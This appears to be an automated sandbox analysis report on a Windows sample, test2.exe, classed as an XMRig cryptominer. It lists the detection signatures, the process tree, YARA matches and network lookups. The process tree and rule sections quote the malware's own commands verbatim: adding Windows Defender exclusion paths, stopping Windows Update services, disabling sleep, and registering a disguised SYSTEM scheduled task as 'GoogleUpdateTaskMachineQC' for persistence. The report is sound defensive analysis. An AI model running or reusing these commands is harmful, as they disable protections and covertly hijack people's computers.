Windows Analysis Report
test2.exe

Overview

General Information

Sample name:test2.exe
Analysis ID:1491606
MD5:80b97cc01243be6495f5df52bcdd6bdf
SHA1:5fe219bfdf8d6825130dcb5414bf05cc56899af5
SHA256:3e178f8b58d7c27ad58180fa75f779e2cf3b141ee3839f17bad52d17fb0642db

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64native
  • test2.exe (PID: 6296 cmdline: "C:\Users\user\Desktop\test2.exe" MD5: 80B97CC01243BE6495F5DF52BCDD6BDF)
    • dialer.exe (PID: 1444 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 888 cmdline: winlogon.exe MD5: A987B43E6A8E8F894B98A3DF022DB518)
      • lsass.exe (PID: 952 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
      • svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: F586835082F632DC8D9404D83BC16316)
      • dwm.exe (PID: 1192 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 1264 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1304 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: F586835082F632DC8D9404D83BC16316)
      • IntelCpHDCPSvc.exe (PID: 1464 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe MD5: B6BAD2BD8596D9101874E9042B8E2D63)
      • svchost.exe (PID: 1472 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1644 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1700 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: F586835082F632DC8D9404D83BC16316)
      • IntelCpHeciSvc.exe (PID: 1760 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe MD5: 3B0DF35583675DE5A08E8D4C1271CEC0)
      • igfxCUIService.exe (PID: 1796 cmdline: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe MD5: 91038D45A86B5465E8B7E5CD63187150)
      • svchost.exe (PID: 1856 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: F586835082F632DC8D9404D83BC16316)
  • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 7468 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5424 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4700 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2728 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8012 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3128 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 6828 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 832 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 920 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2596 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 3188 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7772 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • updater.exe (PID: 5708 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 80B97CC01243BE6495F5DF52BCDD6BDF)
    • dialer.exe (PID: 5060 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • powershell.exe (PID: 5080 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • powershell.exe (PID: 4756 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 832 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 3188 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2200 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 6984 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 6880 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4752 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 5936 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 2404 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 6892 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source / Rule / Description / Author / Strings
Source: C:\Windows\Temp\kkldhmzqxige.tmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: C:\Windows\Temp\kkldhmzqxige.tmp, Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Author: ditekSHen
    • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
    • 0x4d1fc8:$s3: \\.\WinRing0_
    • 0x4ca4c8:$s4: pool_wallet
    • 0x4c62d0:$s5: cryptonight
    • 0x4c62e0:$s5: cryptonight
    • 0x4c62f0:$s5: cryptonight
    • 0x4c6300:$s5: cryptonight
    • 0x4c6318:$s5: cryptonight
    • 0x4c6328:$s5: cryptonight
    • 0x4c6338:$s5: cryptonight
    • 0x4c6350:$s5: cryptonight
    • 0x4c6360:$s5: cryptonight
    • 0x4c6378:$s5: cryptonight
    • 0x4c6390:$s5: cryptonight
    • 0x4c63a0:$s5: cryptonight
    • 0x4c63b0:$s5: cryptonight
    • 0x4c63c0:$s5: cryptonight
    • 0x4c63d8:$s5: cryptonight
    • 0x4c63f0:$s5: cryptonight
    • 0x4c6400:$s5: cryptonight
    • 0x4c6410:$s5: cryptonight
Source: C:\Windows\Temp\kkldhmzqxige.tmp, Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Author: Florian Roth
    • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: C:\Windows\Temp\kkldhmzqxige.tmp, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
    • 0x4cb268:$a1: mining.set_target
    • 0x4c6a48:$a2: XMRIG_HOSTNAME
    • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
    • 0x4c6a20:$a4: XMRIG_VERSION
Source / Rule / Description / Author / Strings
Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown
    • 0x5153a8:$a1: mining.set_target
    • 0x510b88:$a2: XMRIG_HOSTNAME
    • 0x512680:$a3: Usage: xmrig [OPTIONS]
    • 0x510b60:$a4: XMRIG_VERSION

      Operating System Destruction

      Source: Process started, Author: Joe Security, Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7468, ProcessName: cmd.exe

      System Summary

      Source: Process started, Author: Jonathan Cheong, oscd.community, Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 7772, ProcessName: powershell.exe
      Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2904, ProcessName: powershell.exe
      Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 1444, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 1120, ProcessName: svchost.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2904, ProcessName: powershell.exe
      No Suricata rule has matched

      AV Detection

      Source: test2.exe, Avira: detected
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp, Avira: detection malicious, Label: HEUR/AGEN.1362795
      Source: C:\Program Files\Google\Chrome\updater.exe, Avira: detection malicious, Label: HEUR/AGEN.1329646
      Source: http://pesterbdd.com/images/Pester.png, Virustotal: Detection: 10%
      Source: http://pesterbdd.com/images/Pester.pngXz, Virustotal: Detection: 8%
      Source: C:\Program Files\Google\Chrome\updater.exe, Virustotal: Detection: 54%
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp, ReversingLabs: Detection: 86%
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp, Virustotal: Detection: 82%
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, ReversingLabs: Detection: 75%
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, Virustotal: Detection: 76%
      Source: test2.exe, Virustotal: Detection: 54%
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp, Joe Sandbox ML: detected
      Source: C:\Windows\Temp\kkldhmzqxige.tmp, Joe Sandbox ML: detected
      Source: C:\Program Files\Google\Chrome\updater.exe, Joe Sandbox ML: detected
      Source: test2.exe, Joe Sandbox ML: detected

      Bitcoin Miner

      Source: Yara match, File source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
      Source: Yara match, File source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED
      Source: C:\Program Files\Google\Chrome\updater.exe, Directory created: C:\Program Files\Google\Libs
      Source: test2.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: unknown, DNS traffic detected: query: xmr.test.lol replaycode: Name error (3)
      Source: unknown, UDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: global traffic, DNS traffic detected: DNS query: xmr.test.lol
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
      Source: lsass.exe, 00000016.00000002.5693861980.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA08B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435955395.00000207AA10A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA029000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
      Source: lsass.exe, 00000016.00000000.4436179349.00000207AA14C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4486695225.00000207AA023000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435021469.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433293227.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5670096986.00000207A9694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693012290.00000207AA01C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434362319.00000207A9E16000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5696255608.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA14D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4433108426.00000207A9660000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435547592.00000207AA082000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435107666.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4611401089.00000207A9E3C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5693861980.00000207AA04C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
      Source: lsass.exe, 00000016.00000003.5495206203.00000207AA0C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5501135262.00000207AA0EA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5700416146.00000207AA13C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698725509.00000207AA0ED000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500439506.00000207AA0D0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5698244638.00000207AA0D1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435819204.00000207AA0E5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4435766384.00000207AA0C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434234153.00000207A9E0C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4444252537.00000207AA0E9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
      Source: powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000010.00000002.4450454787.000002790E683000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434590665.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5686708510.00000207A9EC5000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000010.00000002.4472008728.00000279289F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
